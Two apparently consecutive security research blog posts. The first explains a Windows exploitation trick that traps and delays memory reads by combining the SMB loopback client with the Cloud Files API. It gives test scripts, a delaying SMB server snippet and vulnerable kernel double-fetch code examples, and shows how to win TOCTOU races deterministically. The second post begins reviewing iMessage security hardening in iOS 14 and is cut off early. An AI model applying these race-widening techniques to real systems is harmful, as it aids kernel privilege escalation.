Using userfaultdd works for in-process access such as from the kernel, but is not really useful if the code accessing the memory is in another process. To solve that problem you can use the FUSE file system as Jann Horn demonstrated in a previous Project Zero blog post. A FUSE file system is implemented entirely in user mode, but any requests for the file go through the Linux kernel’s Virtual File System APIs. As a file is accessed as if it was implemented by an in-kernel file system it’s possible to map that file into memory using mmap. When a page-fault occurs on a FUSE backed memory region a request will be made to the user-mode file system daemon which can delay the read or write request indefinitely.

Remote File Systems

As far as I can tell there’s nothing equivalent to Linux’s userfaultd on Windows. One feature which caught my eye was memory write watches. But those seem to just allow an application to query if memory had been written to since the last time it was checked and doesn’t allow memory writes to be trapped.

If we can’t just trap page-faults to virtual memory what about mapping a file on a user-mode filesystem like FUSE? Unfortunately there is no built-in FUSE driver in Windows 10 (yet?), but that doesn’t mean there’s no mechanism to implement a file system in user-mode. There are some efforts to make a real FUSE on Windows, such as the WinFsp project, but I’d expect the chances of them being installed on a real system to be vanishingly small.

The first thought I had was to try to exploit Multiple UNC Provider (MUP) clients. When you access a file via a UNC path, e.g. \\server\share\file.bin, this will be handled by a MUP driver in the kernel, which will pass it to one of the registered client drivers. As far as the kernel is concerned the opened file is a regular file (with some caveats) which generally means the file can be mapped into memory. However, any requests for the contents of that file will not be handled directly, but instead handled by a server over a network protocol.

Ideally we should be able to implement our own server, handle the read or write requests to a file mapping which will allow us to detect or delay the request so that we can exploit any TOCTOU. The following table contains only Microsoft MUP drivers that I identified. The table contains what versions of Windows 10 the driver is supported on and whether it’s something enabled by default.

Remote File System

Supported Version




Yes (SMBv1 might be disabled)



Yes (except Server SKUs)





Windows 10 1903

No (needs WSL)

Remote Desktop Client



While MUP was designed for remote file systems there’s no requirement that the file system server is actually remote. SMB, WebDAV and NFS are IP based protocols and can be redirected to localhost. P9 uses a local Unix Socket which can’t be remoted anyway. The terminal services client sends file access requests back to the client system over the RDP protocol. For all these protocols we can implement the server with varying degrees of effort and see if we can detect and delay reads and writes to the file mapping.

I decided to focus only on two, SMB and WebDAV. These were the only two which are enabled by default and are trivially usable. While the Remote Desktop Client is in theory installed by default the RDP server is not normally enabled by default. Also setting up the RDP session is complex and might require valid authentication credentials therefore I decided against it.

Server Message Block

SMB is almost as old as Windows itself, having been introduced in Lan Manager 1.0 back in 1987. The latest SMB version 3.1 protocol only bears a passing resemblance to that original version having shed its NetBIOS roots for a TCP/IP connection. Its lineage does mean it’s the best integrated of any of the network file systems, with the MUP APIs being designed around the needs of SMB.

I decided to do a simple test of the behavior of mapping a file over SMB. This is fairly easy as you can access SMB on the same machine via localhost. I first created a 1GiB file on a local disk, the rationale being if SMB supports caching file data it’s unlikely to read something that large in one go. I then started Wireshark and monitored the loopback interface to capture the SMB traffic as shown below.

Overview diagram of SMB test with wireshark in place to inspect the network traffic from the SMB client to the SMB server. The diagram starts overview with a user application reading memory of a mapped file which causes a page fault. As the file is on an SMB share this calls into the SMB client which sends a request to the SMB server and from there to the file system. In between the SMB client and SMB server components the Wireshark logo indicates where we are monitoring the network traffic.

I then wrote a quick PowerShell script which will map the file into memory and then reads a few bytes from memory at a few different offsets.

Use-NtObject($f = Get-NtFile "\\localhost\c$\root\file.bin" -Win32Path) {

    Use-NtObject($s = New-NtSection -File $f -Protection ReadWrite) {

        Use-NtObject($m = Add-NtSection -Section $s -Protection ReadWrite) {

            $m.ReadBytes(0, 4)

            $m.ReadBytes(256*1024*1024, 4)

            $m.ReadBytes(512*1024*1024, 4)

            $m.ReadBytes(768*1024*1024, 4)




This just reads 4 bytes from offset, 0, 256MiB, 512MiB and 768MiB. Going back to Wireshark I filtered the output to only SMBv2 read requests using the display filter smb2.cmd == 8, and the following four packets can be observed.

Read Request Len:32768 Off:0 File: root\file.bin

Read Request Len:32768 Off:268435456 File: root\file.bin

Read Request Len:32768 Off:536870912 File: root\file.bin

Read Request Len:32768 Off:805306368 File: root\file.bin 

This corresponds with the exact memory offsets we accessed in the script although the length is always 32KiB in size, not the 4 we requested. Note, that it’s not the typical Windows memory allocation granularity of 64KiB which you might expect. In my testing I’ve never seen anything other than 32KiB requested.

All the bytes we’ve tested are aligned to the 32KiB block, what if the bytes were not aligned, for example if we accessed 4 bytes from address 512MiB minus 2? Changing the script to add the following allows us to check the behavior:

$m.ReadBytes(512*1024*1024 - 2, 4)

In Wireshark we see the following read requests.

Read Request Len:32768 Off:536838144 File: root\file.bin

Read Request Len:32768 Off:536870912 File: root\file.bin

The accesses are still at 32KiB boundaries, however as the request straddles two blocks the kernel has fetched the preceding 32KiB of data from the file and then the following 32KiB. You might think that all makes sense, however this behavior turned out to be a fluke of testing.

</span><span class=Overview diagram of memory read layout. In the middle is a set of boxes representing the native 4KiB pages being read. All the boxes are contained within a single larger region which is the large page size. Above the boxes are arrows which show that from the base of the 4KiB box a 32KiB read will be made into the file which can satisfy the reads from other 4KiB pages. The final box shows that the last 32KiB of the large page size will always be read as a single page regardless of where in the box the read occurs." style="max-height: 750; max-width: 600;" />

The diagram above shows the structure of how mapped file reads are handled. When an address is read the kernel will request 32KiB from the closest 4KiB page boundary, not the 32KiB boundary. However, there’s then a secondary structure on top based on the supported size of large pages. If the read is anywhere within 32KiB of the end of a large page the read offset is always for the last 32KiB.

For example, on my system the large page size (as queried using the GetLargePageMinimum API) is 2MiB. Therefore if you start at offset 512MiB, between 512 and 514 - 32KiB the kernel will read 32KiB from the offset truncated to the closest 4KiB boundary. Between 514 - 32KiB and 514MiB the read will always request offset 514 - 32KiB so that the 32KiB doesn’t cross the large page boundary.

This allows reads at 4KiB boundaries, however the amount of data read is still 32KiB. This means that once one 4KiB page is accessed the kernel will populate the current page and 7 following pages. Is there any way to only populate a single native page? Based on a comment from Mateusz I tested returning short reads. If the SMB server returns fewer bytes than requested from the read then rather than failing it only populates the pages covered by the read. By returning these short reads we can get trap granularity down to the native page size except for the final 32KiB of a large page. If a read request is shorter than the native page size the rest of the page is zeroed.

What about writing? Let’s change the script again to call WriteBytes rather than ReadBytes, for example:

$m.WriteBytes(256*1024*1024, @(0xAA, 0xBB, 0xCC, 0xDD))

You will see a write request to the file in Wireshark, similar to the following:

Write Request Len:4096 Off:268435456 File: root\file.bin

However, if you dig a bit deeper you’ll notice that the write only happens once the file is closed, not in response to the WriteBytes call. This makes sense, there isn’t any easy way to detect when the write happened to force the page to be flushed back to the file system. Even if there was a way flushing to a network server for every write would have a massive performance impact.

All is not lost however, before the memory is safe to write it must be populated with the contents from the file. Therefore if you look before the write you’ll see a corresponding read request for the 32KiB region which encompasses the write location which is synchronous with the read. You can detect a write through its corresponding read but you can’t distinguish read from a write at the protocol level.

All this testing indicates if we have control over the server we can detect memory access to the mapped file. Can we delay the access as well? I wrote a simple SMB server in .NET 5 using the SMBLibrary by Tal Aloni. I implemented the server with a custom filesystem handler and added some code to the read path which delays for 10 seconds when the file offset is greater than 512MiB.

if (Position >= (512 * 1024 * 1024)) {

    Console.WriteLine("====> Delaying at Position {0:X}", Position);


    Console.WriteLine("====> Continuing.");


The data returned by the read operation can be arbitrary, you just need to fill in the appropriate byte buffers in the read. To test the access times I wrapped the memory read requests inside a Measure-Command call to time the memory access.

Measure-Command { $m.ReadBytes(512*1024*1024 - 4, 4) }

Measure-Command { $m.ReadBytes(512*1024*1024 - 4, 4) }

Measure-Command { $m.ReadBytes(512*1024*1024, 4) }

Measure-Command { $m.ReadBytes(512*1024*1024, 4) }

To compare the access time a read request is made to a location 4 bytes below the 512MiB boundary and then at the 512MiB boundary. By making two requests we should be able to see if the results differ per-read. The results were as follows:

# Below 512MiB (Request 1)

Days              : 0

Hours             : 0

Minutes           : 0

Seconds           : 1

Milliseconds      : 25


# Below 512MiB (Request 2)

Days              : 0

Hours             : 0

Minutes           : 0

Seconds           : 0

Milliseconds      : 1


# Above 512MiB (Request 1)

Days              : 0

Hours             : 0

Minutes           : 0

Seconds           : 10

Milliseconds      : 358


# Above 512MiB (Request 2)

Days              : 0

Hours             : 0

Minutes           : 0

Seconds           : 0

Milliseconds      : 1


The first access for below 512MiB takes around a second, this is because the request still needs to be made to the server and the server is written in .NET which can have a slow startup time for running new code. The second request takes significantly less that 1 second, the memory is now cached locally and so there doesn’t need to be any request.

For the accesses above 512MiB the first request takes around 10 seconds, which correlates with the added delay. The second request takes less than a second because the page is now cached locally. This is exactly what we’d expect, and proves that we can at least delay for 10 seconds. In fact you can delay the request at least 60 seconds before the connection is forcibly reset. This is based on the session timeout for the SMB client. You can query the SMB client timeout using the following command in PowerShell:

PS> (Get-SmbClientConfiguration).SessionTimeout


A few things to note about the SMB client’s behavior which came out of testing. First the client or the Windows cache manager seem to be able to do some caching of the remote file. If you request a specific access when opening the file, such as GENERIC_READ | GENERIC_WRITE for the desired access then caching is enabled. This means the read requests do not go to the server if they’re previously been cached locally. However if you specify MAXIMUM_ALLOWED for the desired access the caching doesn’t seem to take place. Secondly, sometimes parts of the file will be pre-cached, such as the first and last 32KiB of the file. I’ve not worked out what is the cause, oddly it seems to happen more often with native code than .NET code, so perhaps it’s Windows Defender peeking at memory or perhaps Superfetch. In general as long as you keep your memory accesses somewhere in the middle of a large file you should be safe.

If you’ve run the example code you might notice a problem, running the example server locally fails with the following error:

System.Net.Sockets.SocketException (10013): An attempt was made to access a socket in a way forbidden by its access permissions.

By default Windows 10 has the SMB server enabled. This takes over the TCP ports and makes them exclusive so it’s not possible to bind to them from a normal user. It is possible to disable the local SMB server, but that would require administrator privileges. Still, it was worth verifying whether the SMB server approach will work even if we have to communicate with a remote server.

I did do some investigation into tricks I could use to get the built-in SMB server to work for our purposes. For example I tried to use the fact that you can set an Opportunistic Lock which will trap file reads. I used this trick to exploit a TOCTOU vulnerability in the LUAFV driver. Unfortunately the SMB server detects the file is already in a lock and waits for the OpLock break to occur before allowing access to the file. This made it a non-starter.

For testing you can disable the LanmanServer service and its corresponding drivers. If you wanted to use this on an arbitrary system you'd almost certainly need to connect to a remote server. I’ve released the example server code here, which can be repurposed, although it is only a demonstrator. It allows for read granularity of the native page size, which is assumed to be 4KiB. The server code should work on Linux but as of version 1.4.3 of SMBLibrary on NuGet there’s a bug which causes the server to fail when starting. There is a fix in the github repository but at the time of writing there’s no updated package.

How well does abusing the SMB client meet with our criteria from earlier? I’ve crossed out all the ones we’ve met.

  • Works on a default installation of Windows 10 20H2.
  • Gives a clear signal when memory is read or written.
  • Works when memory is accessed from both user and kernel mode.
  • Allows for delaying memory access indefinitely.
  • The data in the memory accessed is arbitrary.
  • The primitive can be set up from a range of privilege levels.
  • Can trap multiple times during the same exploit.

Using the SMB client does meet the majority of our criteria. I verified that it doesn’t matter whether kernel or user mode code accesses the memory it will still trap. The biggest problem is it’s hard to use this from a sandboxed application where it would perhaps be most useful. This is because MUP restricts access to remote file systems by default from restricted and low IL processes and AppContainer sandboxes need specific capabilities which are unlikely to be granted to the majority of applications. That’s not to say it’s completely impossible but it’d be hard to do.

While our trick doesn’t really delay the memory read indefinitely, for our purposes the limit of 60 seconds based on the SMB session timeout is going to be enough for most vulnerabilities. Also once the trap has been activated you can’t force the memory manager to request the same page from the server. I tried playing with memory caching flags and direct IO but at least for files over SMB nothing seemed to work. However, you can specify your own base address when mapping a file so you could map different offsets in the file to the same virtual address by unmapping the original and mapping in a new copy. This would allow you to use the same address multiple times.


As SMB can’t be easily used locally, what about WebDAV? By default TCP port 80 is unused on Windows 10 so we can start our own web server to communicate with. Also unlike on Linux there’s no requirement for having administrator privileges to bind to TCP ports under 1024. Even if either of these were not the case the WebDAV client supports a syntax to specify the TCP port of the server. For example if you use the path \\[email protected]\share then the WebDAV HTTP connection will be made over port 8080.

However, does the WebDAV client expose the right read and write primitives to allow us to trap on memory access? I wrote a simple WebDAV server using the NWebDav library to serve local files. Running the script but specifying the WebDAV server on port 8080 to open the 1GiB file I’m immediately faced with a problem:

Get-NtFile : (0xC0000904) - The file size exceeds the limit allowed and cannot be saved.

Just opening the file fails with the error code STATUS_FILE_TOO_LARGE. The reason for that can be found in one of many Microsoft Knowledge Base articles such as this one. There’s a default limit of 50MB (that’s decimal megabytes) for any file accessed on a WebDAV share because it used to be possible to cause a denial of service by tricking a Windows system into downloading an arbitrarily large file.

The reason this size limiting behavior is in place is why WebDAV isn’t suitable for this attack. If you resize the file to below 50MB you’ll find the WebDAV client pulls the file in its entirety to the local disk before returning from the file open call. That file is then mapped into memory as a local file. The WebDAV server never receives a GET or PUT request for reads/writes to the memory mapping synchronously so there’s no mechanism to detect or trap specific memory requests.

File System Overlay APIs

Abusing the SMB client does work, but it can’t be used locally on a default installation. I decided I need to look for another approach. As I was looking at Windows Filter Drivers (see last blog post) I noticed a few of the drivers provided a mechanism to overlay another file system on top of an existing one. I trawled through MSDN to find the API documentation to see if anything would be suitable. The three I looked at are shown in the table below.

File system

Supported Version


Projected File System

Windows 10 1809


Windows Overlay (WOF)



Cloud Files API

Windows 10 1709

Yes (except non-Desktop Server SKUs)

By far the most interesting one is the Projected File System. This was developed by Microsoft to provide a virtual file system for GIT. It allows placeholder files to be “projected” into a directory on disk and the contents of those files are only “rehydrated” to a full file on demand. In theory this sounds ideal, as long as it would populate the file’s contents piecemeal we could add the delays when receiving the PRJ_GET_FILE_DATA_CB callback.

However a basic implementation based on Microsoft’s ProjectedFileSystem sample code would always rehydrate the entire file during file open, similar to WebDAV. Perhaps there’s an option I missed to stream the contents rather than populate it in one go but I couldn’t find it immediately. In any case the Projected File System is not installed by default making it less useful.

WOF doesn’t really allow you to implement your own file system semantics. Instead it allows you to overlay files from either a secondary Windows Image File (WIM) or compressed on the same volume. This really doesn’t give us the control we’re looking for, you might be able to finagle something to work but it seems a lot of effort.

That leaves us with the Cloud Files API. This is used by OneDrive to provide the local online filesystem but is documented and can be used to implement any file system overlay you like. It works very similar to the Projected File System, with placeholders for files and the concept of hydrating the file on demand. The contents of the files do not need to come from any online service such as OneDrive, it can all be sourced locally. Crucially after some basic testing it supports streaming the contents of the file based on what was being read and you could delay the file data requests and the reading thread would block until the read has been satisfied. This can be enabled by specifying the CF_HYDRATION_POLICY_PRIMARY hydration policy with the value CF_HYDRATION_POLICY_PARTIAL when configuring the base sync root. This allows the Cloud File API to only hydrate the file's parts which were accessed.

This seemed perfect, until I tested with the PowerShell file mapping script where it didn’t work, my cloud file provider would always be requested to provide the entire file. Checking the Cloud Filter driver, when a request is received for mapping a placeholder file, the IRP_MJ_ACQUIRE_FOR_SECTION_SYNCHRONIZATION handler always fully rehydrates the file before completing. If the file is not hydrated fully then the call to NtCreateSection never returns which prevents the file being mapped into memory.

I was going to go back to doing my filter research until I realized I might be able to combine the SMB client loopback with the Cloud Filter API. I already knew that the SMB client doesn’t really map a file, even locally, instead it would read it on-demand via the SMB protocol. And I also knew that the Cloud Filter API would allow streaming of parts of the file on-demand as long as the file wasn’t being mapped into memory. The final setup is shown in the following diagram:

Overview of the operation of the exploitation trick. Memory is read by the application from a mapped file, which causes a page fault. That then requests the contents of the file to be pulled over SMB which goes to the local Cloud Filter Driver and back to the original application where the read is handled.

To use the primitive we first setup our own cloud provider by registering the sync root directory using the CfRegisterSyncRoot API configuring it with the partial hydration policy. Then a 1GiB placeholder can be created in the directory using CfCreatePlaceholders. At this point the file does not have any contents on disk. If we now open and map the placeholder file via the SMB loopback client the file will not be rehydrated immediately.

Any memory access into the mapping will cause the SMB client to make a request for a 32KiB block, which will be passed to our user-mode cloud provider, which we can detect and delay as necessary. It goes without saying that the contents of the file can also be arbitrary. Based on testing it doesn’t seem like you can force the read granularity down to the native page size like when implementing a custom SMB server, however you can still make requests at native page size boundaries within the large page size constraint. It might be possible to modify the file size to trick the SMB server into doing short reads but this behavior has not been tested. A sample implementation of the cloud provider is available here.

Usage Examples

We now have an exploitation trick which allows us to trap and delay virtual memory reads and writes. The big question is, does this improve the exploitation of vulnerabilities such as double fetches? The answer depends on the actual vulnerability. A quick note, when I use the word page I’m meaning the unit of memory which will cause a request to the SMB server, e.g. 32KiB not the native page size such as 4KiB.

Let’s take the example given at the start of this blog post. This vulnerability reads the value from the same memory address, lpInputPtr, twice. First for the comparison, then for the size to copy.  The problem for exploitation is one of the limitations of the technique is the memory trap is one shot. Once the trap has fired to read the size for the comparison you can delay it indefinitely. However, once you provide the requested memory page and the faulting thread is resumed it won’t fire on the second read, it’ll just be read from memory as if it was always there.

You might wonder if you could remap the memory page when you detect the first read? Unfortunately this doesn’t work. When the thread is resumed it restarts at the faulting instruction and will perform the read again, therefore what would happen is the following:

Directory graph showing states of the double fetch. ① Read Size from Pointer -> ② Page Fault -> ③ Remap Page -> ④ Resume Thread -> Back to ①

As you can tell from the diagram you end up trapped in an infinite loop, as you remap a fresh page which just triggers another page fault ad infinitum. If you don’t perform step ③ then the operation will complete and there is a time window between resuming the thread, reading the now valid memory for the size comparison and the second read. However, in this example the time window is likely to be the order of a couple of instructions so using our exploitation trick isn’t better than the existing probabilistic approaches. That said one advantage is you do know when the read occurs which allows you to target the brute force window more accurately.

This example is the worst case, what if there was more time between the reads? Another example from a the Bochspwn paper is shown below:

PDWORD BufferSize = // controlled user-mode address

PUCHAR BufferPtr  = // controlled user-mode address

PUCHAR LocalBuffer;


LocalBuffer = ExAllocatePool(PagedPool, *BufferSize);①

if (LocalBuffer != NULL) {

  RtlCopyMemory(LocalBuffer, BufferPtr, *BufferSize);②

} else {

  // bail out


The same double fetch behavior is present, however what’s different is the value is passed to another function, in this case ExAllocatePool which allocates kernel memory. Depending of the current memory configuration or how large the allocation requested there might be a significant time delay between ① and ②. Is there any way we can win the race?

Well not that I know of, at least not deterministically. But we can exploit one behavior to try to synchronize the reading and writing threads a little. Recall that in order to write to an unresolved page the contents of the page must first be read from the server. Therefore, to maintain consistency any thread writes to the unresolved page must generate a page fault and wait on the same lock as another thread which is just reading from the page, as shown in the following diagram:

Diagram showing separate read and write threads accessing the same pointer, one for read and one for write. When the page fault occurs both threads enter the same lock and they are both resumed once the lock is released.

By synchronizing the reading and writing threads you’re giving yourself a reasonable chance of causing a write to happen during the time window for exploitation. This is still a probabilistic approach, it depends on the scheduler. For example, it’s possible that the write thread is woken before the read thread which will cause the pointer to always take the final value. Or the read thread could run to completion before the write thread is ever scheduled to run making the value never change. It’s possible there’s some scheduler magic such as using multiple reader or writer threads or by selecting appropriate priorities which you could exploit to guarantee read and write ordering. I’d be surprised if something is reliable across multiple Windows 10 systems. I’d be very interested in anyone who’s got better ideas on how to improve the reliability of this.

One approach you might be wondering about is unaligned access, say splitting the value across two separate pages. From a microarchitecture perspective it’s likely that the read will be split up into two parts, first touching one page then another. However, remember how the page fault works, it generates an exception which causes a handler to execute in the kernel. At this point any work the instruction has already done will have been retired while the kernel deals with the page fault. When the thread is resumed it will restart the faulting instruction, which will reissue the appropriate micro operations to read from the unaligned address. Unless the compiler generated two loads for the unaligned access (which might happen on some architectures) then there is no way I know of to restart the memory access instruction part of the way through.

This all seems slightly downbeat on the usefulness of the exploitation trick. Thing is, there’s as many different types of vulnerability as there are fish in the sea (if you’re reading this in 2100, I apologize for the acidification of the seas which killed all marine life, choose your own apocalypse-appropriate proverb instead). For example if we modify the original example as follows:

PDWORD lpInputPtr = // controlled user-mode address

UCHAR  LocalBuffer[256];


if (lpInputPtr[0] > sizeof(LocalBuffer) || lpInputPtr[1] != 2) {



RtlCopyMemory(LocalBuffer, lpInputPtr, *lpInputPtr);

The check now ensures the buffer is large enough and a second DWORD in the buffer is not set to 2. The second field might represent the buffer type, and type 2 isn’t valid for this request. If you check the compiler output for this code, such as on Godbolt, the difference in native code is 2 or 3 instructions. This would seem to not materially improve the odds of winning the TOCTOU race when using a naïve probabilistic approach. But with our exploitation trick we can now build a deterministic exploit.

Diagram showing access memory for the two reads which can generate a page fault which can allow us to modify the original size value. The central part of the diagram shows a previous page which only contains the Size field and the next page which contains the Type field and the rest of the structure.

The diagram above shows how we can achieve this deterministic exploit. We can place the Size field on a different page to the rest of the input buffer, although the buffer is still contiguous in virtual memory. The first page (N-1) should already be faulted into memory and contain the Size field which is smaller than the LocalBuffer size. We can let the read for the size ① complete normally.

Next the code will read the Type field which is on page N ②. This page isn’t currently in memory and so when it’s accessed a page fault will occur ③. This requires the kernel to read the contents from the file, which we can detect and delay. When the read is detected we have as long as we need to modify the Size field to contain a value larger than the LocalBuffer size ④. Finally we complete the read, which will restart the thread back at the Type field read instruction ⑤. The code can continue and will now read the overly large Size field and cause memory corruption.

The key takeaway is that if between the double fetch points the code touches any user mode memory under your control which is not the one being double fetched it should be possible to convert that into a deterministic exploit. It doesn’t matter if the target system only has a single CPU, what the scheduling algorithm is in the kernel, how many instructions are between the double fetch points or what day of the week it is etc, it should “just work”.

The followup blog post on double-fetch exploitation gives some figures for exploitability. The examples shown up to now, when the right timing window is chosen the chance of success can hit 100% after some number of seconds. However, as shown here we can get 100% reliability on some classes of the same bug, but in the best case this isn’t an improvement other than it being deterministic.

All examples up to now only demonste the exploitation of what the blog post refers to as arithmetic races. The blog also mentions a second class of bug, binary races, which are harder to exploit and never reach 100% success. Let’s look at the example in the blog and see if our exploitation trick would do better.

PVOID* UserPointer = // controlled user-mode address

__try {

   ProbeForWrite(*UserPointer, sizeof(STRUCTURE), 1);①

   RtlCopyMemory(*UserPointer, LocalPointer, sizeof(STRUCTURE));②

} __except {

   return GetExceptionCode();


On the face of it this doesn’t look massively different to previous examples, however in this case the destination pointer is being changed rather than the size. The ProbeForWrite kernel API which checks the pointer is both at a user-mode address and the memory is writable. This is a commonly used idiom to verify a user supplied pointer is not pointing into kernel memory.

If the pointer value is changed between ① and ② from a user mode address to a kernel mode address the example would overwrite kernel memory. The behavior is harder to exploit with a probabilistic exploit as there are only two valid values of the pointer, either a user-mode address or a kernel mode address. If you’re brute forcing the pointer value then it’s possible to end up where both fetches read a user-mode pointer even though it might change to a kernel pointer in between the fetches.

Fortunately, due to the call to ProbeForWrite this is trivial to exploit if you can trap on user memory access as shown in the following diagram:

Diagram showing access to the UserPointer which is then passed to ProbeForWrite. We can generate a page fault when probing the buffer which can allow us to modify the original pointer.

From the diagram the first read from UserPointer is made ① and the resulting pointer value passed to ProbeForWrite. The ProbeForWrite API first checks if the pointer is in the user-mode address space, then probes each page of memory up to the size of the length parameter ②. If the page is invalid or is not writable then an exception will be generated and caught by the example's __except block. This gives us our exploit opportunity, we can use the exploitation trick on the one of the user-mode pages which is being probed which will cause ProbeForWrite to generate a page fault we can trap ③. However as the address being probed is not the same as the one storing the pointer we can modify it to contain a kernel mode address while the request is trapped ④. The result is we can deterministically win the race.

Of course I’ve been focussing on kernel double fetches as it’s what originally drew me to look for this behavior. There are many scenarios where this can be used to aid exploitation of user-mode applications. The most obvious one is where a service is sharing memory with a lower privileged application. An example of this sort of issue was a double-fetch in the DfMarshal COM marshaler. The COM marshaler shared a memory section between processes so it was possible to provide a section which exploited our trick. In the end this trick wasn’t necessary as the logic of the vulnerable code allowed me to create an infinite loop to extend the double fetch window. However if that didn't exist we could use this trick to detect and delay when the code was at the point where the handle could be switched.

Another more subtle use is where a privileged process reads memory from a less privileged process. This might be explicit use of APIs such as ReadProcessMemory or it could be indirect, for example querying for the process’ command line using NtQueryInformationProcess will read out memory locations under our control.

The thing to remember with this exploitation trick is it can be used to open up the window to win a timing race. In this case it’s similar to my previous work on oplocks, but instead for memory access. In fact the access to memory might be incidental to the vulnerable code, it doesn’t have to be a memory double fetch or necessarily even a TOCTOU vulnerability. For example you might be trying to win a race between two file paths with symbolic links. As long as the vulnerable code can be made to probe a user mode address we control then you can use it as a timing signal and to widen the exploitation window.


I’ve described an exploitation trick by combining SMB and the Cloud File API which can aid in demonstrating exploitation of certain types of the application and kernel vulnerabilities. It’s possible that there are other ways of achieving a similar result with APIs I haven’t looked at, but for now this is the best approach I’ve come up with. It allows you to trap on reads from user-mode memory, detect when the access occurs and delay the read for at least 60 seconds. Examples of code to implement the SMB and Cloud File API tricks are available here.

It’s worth just reiterating some more of the limitations of this exploitation trick before we conclude.

  • Can’t be used in a sandbox, only from a normal user privilege.
  • Only allows a one shot for any page mapped from the file. If something else (such as AV) tries to read that page or from the file then the trap may fire early.
  • Can’t detect the exact location of a read, limited to a granularity of 4KiB. For local access via the Cloud File API this will always populate the next 7 pages as well as part of the 32KiB read. If accessing a custom SMB server the read size can be reduced to 4KiB. Would prevent exploitation of certain bugs which require precise trapping only on a small area within a larger structure.
  • Can only detect writes indirectly, can’t specifically trap on a write.

From a practical perspective the trick presented here doesn’t significantly improve the win rates for traditional kernel double fetches outlined in the Bochspwn paper. Realistically for most of those classes of vulnerability you’d probably want to use a probabilistic approach, if anything due to its simplicity of implementation. However the trick is applicable to other bug classes where the memory trap is used as a deterministic timing signal adjunct to the vulnerability.

The one shot nature of the trick also makes it of no real benefit to exploiting simple double fetch code paths. Also more complex code which might read and write to a memory address more than once before you get to the vulnerable code which might make managing traps more difficult.

A Look at iMessage in iOS 14

Posted By Samuel Groß, Project Zero

On December 20, Citizenlab published “The Great iPwn”, detailing how “Journalists [were] Hacked with Suspected NSO Group iMessage ‘Zero-Click’ Exploit”. Of particular interest is the following note: “We do not believe that [the exploit] works against iOS 14 and above, which includes new security protections''. Given that it is also now almost exactly one year ago since we published the Remote iPhone Exploitation blog post series, in which we described how an iMessage 0-click exploit can work in practice and gave a number of suggestions on how similar attacks could be prevented in the future, now seemed like a great time to dig into the security improvements in iOS 14 in more detail and explore how Apple has hardened their platform against 0-click attacks.

The content of this blog post is the result of a roughly one-week reverse engineering project, mostly performed on a M1 Mac Mini running macOS 11.1, with the results, where possible, verified to also apply to iOS 14.3, running on an iPhone XS. Due to the nature of this project and the limited timeframe, it is possible that I have missed some relevant changes or made mistakes interpreting some results. Where possible, I’ve tried to describe the steps necessary to verify the presented results, and would appreciate any corrections or additions.

The blog post will start with an overview of the major changes Apple implemented in iOS 14 which affect the security of iMessage. Afterwards, and mostly for the readers interested in the technical details, each of the major improvements is described in more detail while also providing a walkthrough of how it was reverse engineered. At least for the technical details, it is recommended to briefly review the blog post series from last year for a basic introduction to iMessage and the exploitation techniques used to attack it.


Memory corruption based 0-click exploits typically require at least the following pieces:

  1. A memory corruption vulnerability, reachable without user interaction and ideally without triggering any user notifications
  2. A way to break ASLR remotely
  3. A way to turn the vulnerability into remote code execution
  4. (Likely) A way to break out of any sandbox, typically by exploiting a separate vulnerability in another operating system component (e.g. a userspace service or the kernel)

With iOS 14, Apple shipped a significant refactoring of iMessage processing, and made all four parts of the attack harder. This is mainly due to three central changes:

1. The BlastDoor Service

One of the major changes in iOS 14 is the introduction of a new, tightly sandboxed “BlastDoor” service which is now responsible for almost all parsing of untrusted data in iMessages (for example, NSKeyedArchiver payloads). Furthermore, this service is written in Swift, a (mostly) memory safe language which makes it significantly harder to introduce classic memory corruption vulnerabilities into the code base.

The following diagram shows the rough new iMessage processing pipeline, with the name of the respective service process shown at the top of each box.

The iMessage processing pipeline in iOS 14 and macOS Big Sur. An iMessage arrives in apsd as a push notification from Apple’s servers. From there, it is first passed to identityservicesd, which decrypts its payload using the local iMessage private key, then to imagent. Imagent then delegates the majority of the parsing work to the BlastDoor service. Afterwards, if the iMessage contains any attachments, they are downloaded from iCloud servers by IMTransferAgent. If the iMessage contains plugin data (such as a URL with a preview image), the serialized plugin data is again processed by the BlastDoor service and a preview message is generated from it. Finally, IMDPersistenceAgent stores the iMessage into the messages database, triggers a user notification, and returns to imagent, which sends the delivery receipt to the iMessage servers and thus to the sender.

As can be seen, the majority of the processing of complex, untrusted data has been moved into the new BlastDoor service. Furthermore, this design with its 7+ involved services allows fine-grained sandboxing rules to be applied, for example, only the IMTransferAgent and apsd processes are required to perform network operations. As such, all services in this pipeline are now properly sandboxed (with the BlastDoor service arguably being sandboxed the strongest).

2. Re-randomization of the Dyld Shared Cache Region

Historically, ASLR on Apple’s platforms had one architectural weakness: the shared cache region, containing most of the system libraries in a single prelinked blob, was only randomized per boot, and so would stay at the same address across all processes. This turned out to be especially critical in the context of 0-click attacks, as it allowed an attacker, able to remotely observe process crashes (e.g. through timing of automatic delivery receipts), to infer the base address of the shared cache and as such break ASLR, a prerequisite for subsequent exploitation steps.

However, with iOS 14, Apple has added logic to specifically detect this kind of attack, in which case the shared cache is re-randomized for the targeted service the next time it is started, thus rendering this technique useless. This should make bypassing ASLR in a 0-click attack context significantly harder or even impossible (apart from brute force) depending on the concrete vulnerability.

3. Exponential Throttling to Slow Down Brute Force Attacks

To limit an attacker’s ability to retry exploits or brute force ASLR, the BlastDoor and imagent services are now subject to a newly introduced exponential throttling mechanism enforced by launchd, causing the interval between restarts after a crash to double with every subsequent crash (up to an apparent maximum of 20 minutes). With this change, an exploit that relied on repeatedly crashing the attacked service would now likely require in the order of multiple hours to roughly half a day to complete instead of a few minutes.

The remainder of this blog post will now look at each of these three changes in greater depths.

The BlastDoor Service

The new BlastDoor service and its role in the processing of iMessages can be studied by following the flow of an incoming iMessage. On the wire, a simple text iMessage would look something like this, encoded as binary plist:


    // Group UUID

    gid = "008412B9-A4F7-4B96-96C3-70C4276CB2BE";

    // Group protocol version

    gv = 8;

    // Chat participants

    p =     (

        "mailto:[email protected]",

        "mailto:[email protected]"


    // Participants version

    pv = 0;

    // Message being replied to, usually the last message in the chat 

    r = "6401430E-CDD3-4BC7-A377-7611706B431F";

    // The plain text content

    t = "Hello World!";

    // Probably some other version number

    v = 1;

    // The rich text content    

    x = "<html><body>Hello World!</body></html>";  


As such, the minimal steps required to parse it are:

  1. If necessary, decompress the binary data
  2. Decode the plist from its binary serialization format
  3. Extract its various fields and ensure they have the correct type
  4. Decode the `x` key if present, using an XML decoder

